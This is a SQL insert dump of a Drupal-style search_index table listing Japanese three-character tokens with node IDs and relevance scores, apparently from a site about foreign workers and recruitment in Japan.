('だけで', 24, 'ja', 'node_search', 0.78951),
('だけで', 62, 'ja', 'node_search', 0.740689),
('だけで', 98, 'ja', 'node_search', 1),
('だけで', 122, 'ja', 'node_search', 1),
('だけで', 136, 'ja', 'node_search', 1),
('だけで', 138, 'ja', 'node_search', 0.972861),
('だけで', 155, 'ja', 'node_search', 1),
('だけで', 182, 'ja', 'node_search', 1),
('だけで', 183, 'ja', 'node_search', 0.993146),
('だけで', 190, 'ja', 'node_search', 1),
('だける', 27, 'ja', 'node_search', 0.305234),
('だけ早', 28, 'ja', 'node_search', 1),
('ださい', 1, 'ja', 'node_search', 2),
('ださい', 28, 'ja', 'node_search', 3),
('ださい', 62, 'ja', 'node_search', 4.49176),
('ださい', 69, 'ja', 'node_search', 1.90286),
('ださい', 77, 'ja', 'node_search', 13),
('ださい', 87, 'ja', 'node_search', 2.66666),
('ださい', 140, 'ja', 'node_search', 0.938382),
('ださい', 155, 'ja', 'node_search', 0.635),
('ださい', 162, 'ja', 'node_search', 0.613969),
('ださい', 163, 'ja', 'node_search', 0.615536),
('ださっ', 120, 'ja', 'node_search', 1),
('ださり', 120, 'ja', 'node_search', 1),
('ださる', 133, 'ja', 'node_search', 0.866793),
('だたる', 62, 'ja', 'node_search', 1),
('だわり', 27, 'ja', 'node_search', 0.439448),
('だ結果', 191, 'ja', 'node_search', 1),
('ちが求', 189, 'ja', 'node_search', 0.989021),
('ちが自', 23, 'ja', 'node_search', 0.508221),
('ちなが', 23, 'ja', 'node_search', 0.498827),
('ちに実', 135, 'ja', 'node_search', 0.889397),
('ちに対', 23, 'ja', 'node_search', 0.592848),
('ちに感', 69, 'ja', 'node_search', 1),
('ちのア', 136, 'ja', 'node_search', 1),
('ちのカ', 62, 'ja', 'node_search', 4),
('ちのプ', 27, 'ja', 'node_search', 0.373825),
('ちの下', 23, 'ja', 'node_search', 0.565115),
('ちの優', 138, 'ja', 'node_search', 0.729424),
('ちの写', 95, 'ja', 'node_search', 1),
('ちの安', 157, 'ja', 'node_search', 1),
('ちの方', 163, 'ja', 'node_search', 0.672252),
('ちは両', 80, 'ja', 'node_search', 1),
('ちは外', 28, 'ja', 'node_search', 1),
('ちは皆', 1, 'ja', 'node_search', 1),
('ちは皆', 140, 'ja', 'node_search', 1),
('ちを信', 69, 'ja', 'node_search', 1),
('ちんと', 23, 'ja', 'node_search', 0.805455),
('ちんと', 87, 'ja', 'node_search', 0.923838),
('ったお', 120, 'ja', 'node_search', 1),
('った人', 3, 'ja', 'node_search', 0.754681),
('った仕', 23, 'ja', 'node_search', 0.492759),
('った他', 24, 'ja', 'node_search', 0.348001),
('った基', 24, 'ja', 'node_search', 0.471741),
('った基', 26, 'ja', 'node_search', 1),
('った外', 133, 'ja', 'node_search', 0.980874),
('った業', 30, 'ja', 'node_search', 1.84234),
('ってい', 1, 'ja', 'node_search', 1),
('ってい', 3, 'ja', 'node_search', 1.78951),
('ってい', 5, 'ja', 'node_search', 28.9689),
('ってい', 23, 'ja', 'node_search', 0.541108),
('ってい', 24, 'ja', 'node_search', 0.419836),
('ってい', 111, 'ja', 'node_search', 1),
('ってお', 24, 'ja', 'node_search', 0.958394),
('ってお', 27, 'ja', 'node_search', 0.548462),
('ってお', 154, 'ja', 'node_search', 0.860547),
('ってお', 161, 'ja', 'node_search', 0.757065),
('ってお', 164, 'ja', 'node_search', 0.824901),
('ってお', 165, 'ja', 'node_search', 0.813674),
('ってお', 166, 'ja', 'node_search', 0.802752),
('ってお', 167, 'ja', 'node_search', 0.896076),
('ってお', 168, 'ja', 'node_search', 0.78951),
('ってお', 169, 'ja', 'node_search', 0.869951),
('ってお', 170, 'ja', 'node_search', 0.774192),
('ってお', 171, 'ja', 'node_search', 0.848323),
('ってお', 173, 'ja', 'node_search', 0.836446),
('ってお', 174, 'ja', 'node_search', 0.781775),
('ってお', 175, 'ja', 'node_search', 0.842342),
('ってお', 176, 'ja', 'node_search', 0.892724),
('ってお', 177, 'ja', 'node_search', 0.774192),
('ってお', 178, 'ja', 'node_search', 0.845322),
('ってお', 184, 'ja', 'node_search', 0.771698),
('ってお', 185, 'ja', 'node_search', 0.759465),
('ってお', 187, 'ja', 'node_search', 0.774192),
('ってお', 189, 'ja', 'node_search', 0.759465),
('ってお', 190, 'ja', 'node_search', 0.808176),
('ってお', 194, 'ja', 'node_search', 0.78951),
('ってお', 199, 'ja', 'node_search', 0.76431),
('ってき', 19, 'ja', 'node_search', 1),
('ってき', 23, 'ja', 'node_search', 1),
('ってく', 69, 'ja', 'node_search', 1),
('ってま', 179, 'ja', 'node_search', 0.816452),
('っても', 3, 'ja', 'node_search', 0.747619),
('って働', 162, 'ja', 'node_search', 0.661163),
('って出', 9, 'ja', 'node_search', 3),
('って出', 17, 'ja', 'node_search', 4),
('って大', 135, 'ja', 'node_search', 0.792123),
('って大', 164, 'ja', 'node_search', 1),
('って大', 171, 'ja', 'node_search', 1),
('って大', 174, 'ja', 'node_search', 0.993146),
('って大', 177, 'ja', 'node_search', 1),
('って実', 199, 'ja', 'node_search', 0.945829),
('って成', 173, 'ja', 'node_search', 0.876337),
('って挑', 183, 'ja', 'node_search', 0.839384),
('って最', 27, 'ja', 'node_search', 0.575885),
('って秋', 150, 'ja', 'node_search', 1),
('って達', 190, 'ja', 'node_search', 1),
('って韓', 6, 'ja', 'node_search', 28),
('ついて', 1, 'ja', 'node_search', 1),
('ついて', 3, 'ja', 'node_search', 2.87401),
('ついて', 29, 'ja', 'node_search', 3),
('ついて', 30, 'ja', 'node_search', 1.84234),
('ついて', 122, 'ja', 'node_search', 1),
('ついて', 155, 'ja', 'node_search', 1.65864),
('ついて', 162, 'ja', 'node_search', 0.635),
('つくば', 163, 'ja', 'node_search', 28.9611),
('つけら', 3, 'ja', 'node_search', 0.580033),
('つける', 3, 'ja', 'node_search', 0.597248),
('つける', 179, 'ja', 'node_search', 0.896076),
('つため', 24, 'ja', 'node_search', 0.406601),
('つであ', 27, 'ja', 'node_search', 0.488796),
('つです', 162, 'ja', 'node_search', 0.813674),
('つなが', 24, 'ja', 'node_search', 0.369343),
('つなが', 164, 'ja', 'node_search', 0.842342),
('つなが', 178, 'ja', 'node_search', 0.972861),
('つなが', 189, 'ja', 'node_search', 0.876337),
('つなが', 192, 'ja', 'node_search', 0.889397),
('つなが', 193, 'ja', 'node_search', 0.916736),
('つなが', 194, 'ja', 'node_search', 0.906287),
('つなが', 197, 'ja', 'node_search', 0.899454),
('つなぐ', 160, 'ja', 'node_search', 0.792123),
('つのポ', 5, 'ja', 'node_search', 3),
('つもの', 62, 'ja', 'node_search', 0.899454),
('つ労働', 7, 'ja', 'node_search', 1.79932),
('つ方の', 7, 'ja', 'node_search', 3.8861),
('つ星ホ', 18, 'ja', 'node_search', 28),
('つ講師', 133, 'ja', 'node_search', 1),
('づいた', 140, 'ja', 'node_search', 1),
('ていた', 5, 'ja', 'node_search', 0.968904),
('ていた', 24, 'ja', 'node_search', 1),
('ていた', 27, 'ja', 'node_search', 0.904032),
('ていた', 135, 'ja', 'node_search', 0.672252),
('ていて', 5, 'ja', 'node_search', 28),
('ていて', 24, 'ja', 'node_search', 0.419117),
('ていま', 1, 'ja', 'node_search', 1),
('ていま', 5, 'ja', 'node_search', 4.60668),
('ていま', 7, 'ja', 'node_search', 1.8861),
('ていま', 8, 'ja', 'node_search', 2),
('ていま', 10, 'ja', 'node_search', 3),
('ていま', 18, 'ja', 'node_search', 3),
('ていま', 23, 'ja', 'node_search', 1.95781),
('ていま', 24, 'ja', 'node_search', 0.361229),
('ていま', 27, 'ja', 'node_search', 2.24561),
('ていま', 28, 'ja', 'node_search', 1),
('ていま', 30, 'ja', 'node_search', 3),
('ていま', 80, 'ja', 'node_search', 1),
('ていま', 111, 'ja', 'node_search', 1),
('ていま', 113, 'ja', 'node_search', 1),
('ていま', 116, 'ja', 'node_search', 1),
('ていま', 133, 'ja', 'node_search', 0.697623),
('ていま', 135, 'ja', 'node_search', 2.41121),
('ていま', 136, 'ja', 'node_search', 1.64694);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('ていま', 138, 'ja', 'node_search', 0.738408),
('ていま', 140, 'ja', 'node_search', 0.776703),
('ていま', 187, 'ja', 'node_search', 0.879565),
('ている', 1, 'ja', 'node_search', 1),
('ている', 3, 'ja', 'node_search', 0.78951),
('ている', 18, 'ja', 'node_search', 0.957226),
('ている', 138, 'ja', 'node_search', 1),
('ている', 140, 'ja', 'node_search', 0.857458),
('ている', 142, 'ja', 'node_search', 1.86366),
('ている', 155, 'ja', 'node_search', 0.689612),
('ている', 162, 'ja', 'node_search', 0.845322),
('ていれ', 3, 'ja', 'node_search', 1),
('ておく', 87, 'ja', 'node_search', 16),
('ており', 23, 'ja', 'node_search', 0.650439),
('ており', 24, 'ja', 'node_search', 2.83587),
('ており', 26, 'ja', 'node_search', 2),
('ており', 27, 'ja', 'node_search', 1.32591),
('ており', 135, 'ja', 'node_search', 1),
('ており', 154, 'ja', 'node_search', 0.857458),
('ており', 161, 'ja', 'node_search', 0.754681),
('ており', 163, 'ja', 'node_search', 1),
('ており', 164, 'ja', 'node_search', 0.822065),
('ており', 165, 'ja', 'node_search', 0.810915),
('ており', 166, 'ja', 'node_search', 0.800068),
('ており', 167, 'ja', 'node_search', 0.892724),
('ており', 168, 'ja', 'node_search', 0.786915),
('ており', 169, 'ja', 'node_search', 0.866793),
('ており', 170, 'ja', 'node_search', 0.771698),
('ており', 171, 'ja', 'node_search', 0.845322),
('ており', 173, 'ja', 'node_search', 0.833529),
('ており', 174, 'ja', 'node_search', 0.779231),
('ており', 175, 'ja', 'node_search', 0.839384),
('ており', 176, 'ja', 'node_search', 0.889397),
('ており', 177, 'ja', 'node_search', 0.771698),
('ており', 178, 'ja', 'node_search', 0.842342),
('ており', 182, 'ja', 'node_search', 0.842342),
('ており', 183, 'ja', 'node_search', 0.774192),
('ており', 184, 'ja', 'node_search', 0.769219),
('ており', 185, 'ja', 'node_search', 0.757065),
('ており', 187, 'ja', 'node_search', 0.771698),
('ており', 188, 'ja', 'node_search', 0.851346),
('ており', 189, 'ja', 'node_search', 0.757065),
('ており', 190, 'ja', 'node_search', 0.805455),
('ており', 194, 'ja', 'node_search', 0.786915),
('ており', 197, 'ja', 'node_search', 0.805455),
('ており', 199, 'ja', 'node_search', 0.76188),
('てお伝', 3, 'ja', 'node_search', 2.8569),
('てから', 3, 'ja', 'node_search', 0.615536),
('てがう', 69, 'ja', 'node_search', 1),
('てきた', 165, 'ja', 'node_search', 0.968904),
('てきた', 184, 'ja', 'node_search', 0.972861),
('てきま', 19, 'ja', 'node_search', 1),
('てきま', 23, 'ja', 'node_search', 1.81645),
('てきま', 27, 'ja', 'node_search', 0.402597),
('てくだ', 28, 'ja', 'node_search', 3),
('てくだ', 62, 'ja', 'node_search', 0.492759),
('てくだ', 69, 'ja', 'node_search', 1.90286),
('てくだ', 77, 'ja', 'node_search', 12),
('てくだ', 87, 'ja', 'node_search', 2.66666),
('てくだ', 120, 'ja', 'node_search', 2),
('てくだ', 133, 'ja', 'node_search', 0.873132),
('てくだ', 140, 'ja', 'node_search', 0.945829),
('てくれ', 69, 'ja', 'node_search', 1),
('てご家', 156, 'ja', 'node_search', 1),
('てご家', 157, 'ja', 'node_search', 0.997306),
('てご本', 191, 'ja', 'node_search', 1),
('てご活', 154, 'ja', 'node_search', 0.892724),
('てさら', 1, 'ja', 'node_search', 1),
('てのレ', 122, 'ja', 'node_search', 1),
('ての充', 170, 'ja', 'node_search', 0.827757),
('ての学', 136, 'ja', 'node_search', 0.968904),
('ての建', 27, 'ja', 'node_search', 1.46367),
('ての役', 80, 'ja', 'node_search', 1),
('ての溶', 9, 'ja', 'node_search', 3),
('ての溶', 17, 'ja', 'node_search', 4),
('ての生', 140, 'ja', 'node_search', 1),
('ての良', 30, 'ja', 'node_search', 1.84234),
('てまい', 154, 'ja', 'node_search', 0.794753),
('てまい', 160, 'ja', 'node_search', 0.757065),
('てまい', 161, 'ja', 'node_search', 0.813674),
('てまい', 164, 'ja', 'node_search', 0.759465),
('てまい', 165, 'ja', 'node_search', 0.757065),
('てまい', 167, 'ja', 'node_search', 0.824901),
('てまい', 173, 'ja', 'node_search', 0.769219),
('てまい', 174, 'ja', 'node_search', 0.729424),
('てまい', 175, 'ja', 'node_search', 0.776703),
('てまい', 176, 'ja', 'node_search', 0.747619),
('てまい', 179, 'ja', 'node_search', 0.813674),
('てまい', 186, 'ja', 'node_search', 0.845322),
('てまし', 87, 'ja', 'node_search', 0.580033),
('てもコ', 24, 'ja', 'node_search', 0.417688),
('ても一', 87, 'ja', 'node_search', 1),
('ても不', 3, 'ja', 'node_search', 0.745294),
('ても学', 122, 'ja', 'node_search', 1),
('ても学', 155, 'ja', 'node_search', 0.968904),
('てサポ', 138, 'ja', 'node_search', 0.670377),
('てシン', 5, 'ja', 'node_search', 28),
('てタイ', 163, 'ja', 'node_search', 0.759465),
('てフェ', 5, 'ja', 'node_search', 0.854391),
('て与え', 7, 'ja', 'node_search', 1.8861),
('て人を', 189, 'ja', 'node_search', 1),
('て今回', 181, 'ja', 'node_search', 1),
('て今回', 184, 'ja', 'node_search', 1),
('て使わ', 23, 'ja', 'node_search', 0.902857),
('て働き', 5, 'ja', 'node_search', 3),
('て働き', 8, 'ja', 'node_search', 2),
('て働け', 162, 'ja', 'node_search', 0.659351),
('て出発', 156, 'ja', 'node_search', 1),
('て出発', 157, 'ja', 'node_search', 1),
('て出迎', 9, 'ja', 'node_search', 3),
('て出迎', 17, 'ja', 'node_search', 4),
('て十分', 194, 'ja', 'node_search', 0.968904),
('て十分', 197, 'ja', 'node_search', 0.961087),
('て協力', 69, 'ja', 'node_search', 1),
('て参り', 23, 'ja', 'node_search', 0.412762),
('て参り', 25, 'ja', 'node_search', 1),
('て大き', 135, 'ja', 'node_search', 0.78951),
('て大き', 164, 'ja', 'node_search', 1),
('て大き', 171, 'ja', 'node_search', 1),
('て大き', 174, 'ja', 'node_search', 0.989021),
('て大き', 177, 'ja', 'node_search', 1),
('て大き', 190, 'ja', 'node_search', 0.96498),
('て学習', 135, 'ja', 'node_search', 0.916736),
('て学習', 142, 'ja', 'node_search', 0.942091),
('て学習', 182, 'ja', 'node_search', 1),
('て実現', 199, 'ja', 'node_search', 0.942091),
('て将来', 195, 'ja', 'node_search', 1),
('て引き', 186, 'ja', 'node_search', 0.876337),
('て心か', 133, 'ja', 'node_search', 0.810915),
('て必須', 142, 'ja', 'node_search', 0.72066),
('て成長', 173, 'ja', 'node_search', 0.873132),
('て挑戦', 183, 'ja', 'node_search', 0.836446),
('て採用', 156, 'ja', 'node_search', 1.94583),
('て採用', 157, 'ja', 'node_search', 1.83645),
('て支援', 160, 'ja', 'node_search', 0.771698),
('て日本', 68, 'ja', 'node_search', 1),
('て日本', 147, 'ja', 'node_search', 7),
('て日本', 154, 'ja', 'node_search', 1),
('て日本', 164, 'ja', 'node_search', 1.75231),
('て日本', 165, 'ja', 'node_search', 1.74996),
('て日本', 166, 'ja', 'node_search', 1),
('て日本', 167, 'ja', 'node_search', 1.81645),
('て日本', 169, 'ja', 'node_search', 1.78691),
('て日本', 171, 'ja', 'node_search', 1.77419),
('て日本', 173, 'ja', 'node_search', 1.76188),
('て日本', 174, 'ja', 'node_search', 1.7185),
('て日本', 175, 'ja', 'node_search', 1.76431),
('て日本', 176, 'ja', 'node_search', 1.74069),
('て日本', 177, 'ja', 'node_search', 1.71),
('て日本', 184, 'ja', 'node_search', 1.75707),
('て日本', 186, 'ja', 'node_search', 1),
('て日本', 192, 'ja', 'node_search', 1),
('て最新', 27, 'ja', 'node_search', 0.574516),
('て準備', 142, 'ja', 'node_search', 1),
('て準備', 193, 'ja', 'node_search', 1),
('て溶接', 6, 'ja', 'node_search', 3),
('て秋田', 150, 'ja', 'node_search', 1),
('て経験', 138, 'ja', 'node_search', 1),
('て設立', 27, 'ja', 'node_search', 0.335733),
('て説明', 29, 'ja', 'node_search', 3),
('て迅速', 6, 'ja', 'node_search', 3),
('て道徳', 87, 'ja', 'node_search', 1),
('て達成', 190, 'ja', 'node_search', 1),
('て面接', 98, 'ja', 'node_search', 1),
('て韓国', 6, 'ja', 'node_search', 28),
('て高く', 162, 'ja', 'node_search', 0.866793),
('であり', 3, 'ja', 'node_search', 0.683725),
('であり', 7, 'ja', 'node_search', 1.8861),
('であり', 27, 'ja', 'node_search', 0.487816),
('であり', 160, 'ja', 'node_search', 1),
('であり', 161, 'ja', 'node_search', 1),
('であり', 168, 'ja', 'node_search', 1),
('であり', 170, 'ja', 'node_search', 1),
('であり', 174, 'ja', 'node_search', 0.942091),
('であり', 180, 'ja', 'node_search', 1.9347),
('であり', 181, 'ja', 'node_search', 0.96498),
('であり', 185, 'ja', 'node_search', 0.879565),
('であり', 186, 'ja', 'node_search', 0.972861),
('であり', 188, 'ja', 'node_search', 1),
('であり', 191, 'ja', 'node_search', 0.949597),
('であり', 192, 'ja', 'node_search', 0.934703),
('であり', 193, 'ja', 'node_search', 1),
('であり', 196, 'ja', 'node_search', 1.94583),
('であり', 198, 'ja', 'node_search', 1),
('であり', 199, 'ja', 'node_search', 1.91674),
('である', 18, 'ja', 'node_search', 1),
('である', 23, 'ja', 'node_search', 1.75707),
('である', 24, 'ja', 'node_search', 0.685676),
('である', 87, 'ja', 'node_search', 0.645209),
('である', 179, 'ja', 'node_search', 1),
('でいま', 120, 'ja', 'node_search', 0.886095),
('でいま', 150, 'ja', 'node_search', 1),
('でおり', 24, 'ja', 'node_search', 0.733888),
('でおり', 27, 'ja', 'node_search', 0.860547),
('でおり', 150, 'ja', 'node_search', 1),
('でお問', 162, 'ja', 'node_search', 0.62674),
('できな', 3, 'ja', 'node_search', 0.519091),
('できな', 24, 'ja', 'node_search', 0.528135),
('できま', 120, 'ja', 'node_search', 1),
('できま', 122, 'ja', 'node_search', 1),
('できま', 136, 'ja', 'node_search', 0.749958),
('できま', 138, 'ja', 'node_search', 0.886095),
('できま', 147, 'ja', 'node_search', 1),
('できま', 155, 'ja', 'node_search', 0.942091),
('できる', 3, 'ja', 'node_search', 0.949597),
('できる', 5, 'ja', 'node_search', 0.752312),
('できる', 23, 'ja', 'node_search', 0.476356),
('できる', 24, 'ja', 'node_search', 0.953396),
('できる', 27, 'ja', 'node_search', 0.495774),
('できる', 28, 'ja', 'node_search', 1),
('できる', 30, 'ja', 'node_search', 1.84234),
('できる', 62, 'ja', 'node_search', 0.545988),
('できる', 163, 'ja', 'node_search', 0.976851),
('でくだ', 62, 'ja', 'node_search', 4),
('でくだ', 77, 'ja', 'node_search', 1),
('でご活', 177, 'ja', 'node_search', 0.742984),
('でした', 120, 'ja', 'node_search', 1),
('でしょ', 3, 'ja', 'node_search', 1.50141),
('ですか', 3, 'ja', 'node_search', 3),
('ですが', 3, 'ja', 'node_search', 0.860547),
('ででき', 24, 'ja', 'node_search', 0.529288),
('でとう', 68, 'ja', 'node_search', 23),
('でとう', 69, 'ja', 'node_search', 1),
('でとう', 70, 'ja', 'node_search', 20),
('でとう', 71, 'ja', 'node_search', 2),
('でとう', 72, 'ja', 'node_search', 20),
('でとう', 73, 'ja', 'node_search', 20),
('でとう', 74, 'ja', 'node_search', 20),
('でとう', 75, 'ja', 'node_search', 47),
('でとう', 76, 'ja', 'node_search', 20),
('でとう', 77, 'ja', 'node_search', 26),
('でとう', 78, 'ja', 'node_search', 23),
('でとう', 80, 'ja', 'node_search', 25.9892),
('でとう', 81, 'ja', 'node_search', 23),
('でとう', 82, 'ja', 'node_search', 47),
('でとう', 83, 'ja', 'node_search', 20),
('でとう', 84, 'ja', 'node_search', 47),
('でとう', 85, 'ja', 'node_search', 26),
('でとう', 86, 'ja', 'node_search', 2),
('でとう', 88, 'ja', 'node_search', 2),
('でとう', 89, 'ja', 'node_search', 20),
('でとう', 90, 'ja', 'node_search', 47),
('でとう', 91, 'ja', 'node_search', 20),
('でとう', 92, 'ja', 'node_search', 20),
('でとう', 93, 'en', 'node_search', 29),
('でとう', 93, 'ja', 'node_search', 20),
('でとう', 96, 'ja', 'node_search', 20),
('でとう', 97, 'ja', 'node_search', 20),
('でとう', 99, 'ja', 'node_search', 20),
('でとう', 100, 'ja', 'node_search', 23),
('でとう', 101, 'ja', 'node_search', 20),
('でとう', 102, 'ja', 'node_search', 23),
('でとう', 103, 'ja', 'node_search', 20),
('でとう', 104, 'ja', 'node_search', 29),
('でとう', 105, 'ja', 'node_search', 20),
('でとう', 106, 'ja', 'node_search', 20),
('でとう', 107, 'ja', 'node_search', 20),
('でとう', 108, 'ja', 'node_search', 20),
('でとう', 109, 'ja', 'node_search', 23),
('でとう', 110, 'ja', 'node_search', 20),
('でとう', 111, 'ja', 'node_search', 19),
('でとう', 112, 'ja', 'node_search', 20),
('でとう', 113, 'ja', 'node_search', 20),
('でとう', 114, 'ja', 'node_search', 20),
('でとう', 115, 'ja', 'node_search', 20),
('でとう', 117, 'ja', 'node_search', 20),
('でとう', 118, 'ja', 'node_search', 20),
('でとう', 119, 'ja', 'node_search', 20),
('でとう', 121, 'ja', 'node_search', 20),
('でとう', 123, 'ja', 'node_search', 20),
('でとう', 124, 'ja', 'node_search', 20),
('でとう', 125, 'ja', 'node_search', 20),
('でとう', 127, 'ja', 'node_search', 19),
('でとう', 128, 'ja', 'node_search', 19),
('でとう', 129, 'ja', 'node_search', 19),
('でとう', 130, 'ja', 'node_search', 19),
('でとう', 131, 'ja', 'node_search', 20),
('でとう', 132, 'ja', 'node_search', 20),
('でとう', 134, 'ja', 'node_search', 20),
('でとう', 137, 'ja', 'node_search', 20),
('でとう', 139, 'ja', 'node_search', 20),
('でとう', 140, 'ja', 'node_search', 1),
('でとう', 141, 'ja', 'node_search', 20),
('でとう', 143, 'ja', 'node_search', 20),
('でとう', 144, 'ja', 'node_search', 20),
('でとう', 145, 'ja', 'node_search', 20),
('でとう', 146, 'ja', 'node_search', 20),
('でとう', 147, 'ja', 'node_search', 20),
('でとう', 148, 'ja', 'node_search', 20),
('でとう', 151, 'ja', 'node_search', 20),
('でとう', 152, 'en', 'node_search', 20),
('でとう', 152, 'ja', 'node_search', 20),
('でとう', 153, 'ja', 'node_search', 20),
('でとう', 161, 'ja', 'node_search', 0.800068),
('でとう', 166, 'ja', 'node_search', 0.786915),
('でとう', 168, 'ja', 'node_search', 0.774192),
('でとう', 170, 'ja', 'node_search', 0.759465),
('でとう', 181, 'ja', 'node_search', 4),
('でとう', 182, 'ja', 'node_search', 0.830633),
('でとう', 183, 'ja', 'node_search', 0.76431),
('でとう', 187, 'ja', 'node_search', 0.752312),
('でとう', 190, 'ja', 'node_search', 0.784336),
('でとう', 194, 'ja', 'node_search', 0.766757),
('でとう', 197, 'ja', 'node_search', 0.784336),
('でなく', 24, 'ja', 'node_search', 0.784336),
('でなく', 62, 'ja', 'node_search', 0.736141),
('でなく', 122, 'ja', 'node_search', 1),
('でなく', 136, 'ja', 'node_search', 1),
('でなく', 138, 'ja', 'node_search', 0.96498),
('でなく', 155, 'ja', 'node_search', 1),
('でなく', 182, 'ja', 'node_search', 0.997306),
('でなく', 183, 'ja', 'node_search', 0.98493),
('でなく', 190, 'ja', 'node_search', 1),
('でにな', 23, 'ja', 'node_search', 0.766757),
('でに効', 28, 'ja', 'node_search', 1),
('でのご', 156, 'ja', 'node_search', 1),
('でのご', 157, 'ja', 'node_search', 1),
('でのご', 160, 'ja', 'node_search', 0.866793),
('でのご', 161, 'ja', 'node_search', 0.916736),
('でのご', 166, 'ja', 'node_search', 0.896076),
('でのご', 168, 'ja', 'node_search', 0.899454),
('でのご', 170, 'ja', 'node_search', 0.909743),
('でのご', 179, 'ja', 'node_search', 0.757065),
('でのご', 180, 'ja', 'node_search', 0.845322),
('でのご', 191, 'ja', 'node_search', 0.833529),
('でのご', 192, 'ja', 'node_search', 0.819249),
('でのご', 193, 'ja', 'node_search', 0.819249),
('でのご', 195, 'ja', 'node_search', 0.842342),
('でのご', 196, 'ja', 'node_search', 0.842342),
('でのご', 198, 'ja', 'node_search', 0.805455),
('でのさ', 113, 'ja', 'node_search', 1),
('でのさ', 178, 'ja', 'node_search', 0.827757),
('でのキ', 160, 'ja', 'node_search', 4),
('でのキ', 161, 'ja', 'node_search', 1),
('でのキ', 185, 'ja', 'node_search', 1),
('でのキ', 193, 'ja', 'node_search', 1),
('でのキ', 198, 'ja', 'node_search', 1),
('でのロ', 135, 'ja', 'node_search', 0.98493),
('での介', 121, 'ja', 'node_search', 1),
('での介', 165, 'ja', 'node_search', 1),
('での充', 168, 'ja', 'node_search', 0.845322),
('での努', 171, 'ja', 'node_search', 0.961087),
('での努', 174, 'ja', 'node_search', 1),
('での努', 175, 'ja', 'node_search', 1),
('での努', 177, 'ja', 'node_search', 0.957226),
('での努', 178, 'ja', 'node_search', 1),
('での努', 187, 'ja', 'node_search', 1),
('での外', 161, 'ja', 'node_search', 1),
('での学', 176, 'ja', 'node_search', 1),
('での就', 155, 'ja', 'node_search', 1),
('での就', 186, 'ja', 'node_search', 0.896076),
('での新', 126, 'ja', 'node_search', 1),
('での新', 164, 'ja', 'node_search', 4),
('での新', 166, 'ja', 'node_search', 0.866793),
('での新', 169, 'ja', 'node_search', 4),
('での新', 171, 'ja', 'node_search', 0.927431),
('での新', 174, 'ja', 'node_search', 27),
('での新', 175, 'ja', 'node_search', 27.9931),
('での新', 177, 'ja', 'node_search', 27.9203),
('での新', 178, 'ja', 'node_search', 0.920273),
('での新', 185, 'ja', 'node_search', 0.808176),
('での新', 187, 'ja', 'node_search', 0.836446),
('での新', 188, 'ja', 'node_search', 0.800068),
('での新', 189, 'ja', 'node_search', 0.816452),
('での新', 197, 'ja', 'node_search', 1),
('での新', 199, 'ja', 'node_search', 0.819249),
('での機', 135, 'ja', 'node_search', 0.76431),
('での活', 150, 'ja', 'node_search', 1),
('での特', 163, 'ja', 'node_search', 1),
('での生', 154, 'ja', 'node_search', 0.997306),
('での生', 164, 'ja', 'node_search', 0.916736),
('での生', 165, 'ja', 'node_search', 0.873132),
('での生', 169, 'ja', 'node_search', 0.824901),
('での生', 174, 'ja', 'node_search', 0.892724),
('での生', 176, 'ja', 'node_search', 0.833529),
('での皆', 140, 'ja', 'node_search', 0.819249),
('での経', 193, 'ja', 'node_search', 1),
('での言', 24, 'ja', 'node_search', 0.462781),
('での言', 138, 'ja', 'node_search', 0.860547),
('での訪', 162, 'ja', 'node_search', 1),
('での進', 181, 'ja', 'node_search', 0.953396),
('での食', 115, 'ja', 'node_search', 1),
('ではき', 87, 'ja', 'node_search', 0.934703),
('ではな', 3, 'ja', 'node_search', 0.733888),
('では先', 87, 'ja', 'node_search', 1),
('では韓', 24, 'ja', 'node_search', 1),
('でもあ', 182, 'ja', 'node_search', 0.920273),
('でもあ', 183, 'ja', 'node_search', 0.889397),
('でもあ', 196, 'ja', 'node_search', 0.899454),
('でも頑', 69, 'ja', 'node_search', 1),
('でやり', 188, 'ja', 'node_search', 0.953396),
('でより', 111, 'ja', 'node_search', 1),
('でアク', 5, 'ja', 'node_search', 0.805455),
('でキャ', 187, 'ja', 'node_search', 1),
('でクラ', 27, 'ja', 'node_search', 0.420557),
('でコミ', 18, 'ja', 'node_search', 1),
('でシー', 135, 'ja', 'node_search', 0.71),
('でミャ', 126, 'ja', 'node_search', 1),
('で一般', 5, 'ja', 'node_search', 3),
('で事業', 27, 'ja', 'node_search', 1),
('で介護', 178, 'ja', 'node_search', 1),
('で仕事', 24, 'ja', 'node_search', 0.504001),
('で住宅', 27, 'ja', 'node_search', 0.383732),
('で体力', 163, 'ja', 'node_search', 0.7017),
('で健康', 18, 'ja', 'node_search', 1),
('で働い', 69, 'ja', 'node_search', 0.913226),
('で働き', 10, 'ja', 'node_search', 3),
('で働き', 23, 'ja', 'node_search', 0.60322),
('で働き', 24, 'ja', 'node_search', 1.56511),
('で働き', 26, 'ja', 'node_search', 1),
('で働く', 3, 'ja', 'node_search', 0.650439),
('で働く', 7, 'ja', 'node_search', 1.8834),
('で働く', 18, 'ja', 'node_search', 3),
('で働く', 77, 'ja', 'node_search', 1),
('で働く', 137, 'ja', 'node_search', 1),
('で働く', 139, 'ja', 'node_search', 1),
('で働く', 143, 'ja', 'node_search', 1),
('で働く', 144, 'ja', 'node_search', 1),
('で働く', 147, 'ja', 'node_search', 1),
('で働く', 155, 'ja', 'node_search', 0.71),
('で働く', 160, 'ja', 'node_search', 1),
('で働く', 166, 'ja', 'node_search', 1),
('で働く', 168, 'ja', 'node_search', 1),
('で働く', 170, 'ja', 'node_search', 1),
('で働く', 180, 'ja', 'node_search', 1),
('で働く', 184, 'ja', 'node_search', 1),
('で働く', 186, 'ja', 'node_search', 1),
('で働く', 190, 'ja', 'node_search', 1),
('で働く', 191, 'ja', 'node_search', 1),
('で働く', 192, 'ja', 'node_search', 1),
('で働く', 196, 'ja', 'node_search', 1),
('で働く', 199, 'ja', 'node_search', 1),
('で優位', 24, 'ja', 'node_search', 0.41),
('で元従', 27, 'ja', 'node_search', 0.653974),
('で募集', 10, 'ja', 'node_search', 3),
('で勤め', 24, 'ja', 'node_search', 0.816452),
('で十分', 5, 'ja', 'node_search', 0.740689),
('で取り', 135, 'ja', 'node_search', 1),
('で可能', 163, 'ja', 'node_search', 0.813674),
('で合格', 81, 'ja', 'node_search', 1),
('で困難', 136, 'ja', 'node_search', 0.923838),
('で国際', 194, 'ja', 'node_search', 1),
('で多く', 27, 'ja', 'node_search', 0.469921),
('で多く', 167, 'ja', 'node_search', 1),
('で多く', 169, 'ja', 'node_search', 0.953396),
('で多く', 173, 'ja', 'node_search', 0.934703),
('で多く', 176, 'ja', 'node_search', 0.976851),
('で多く', 184, 'ja', 'node_search', 0.866793),
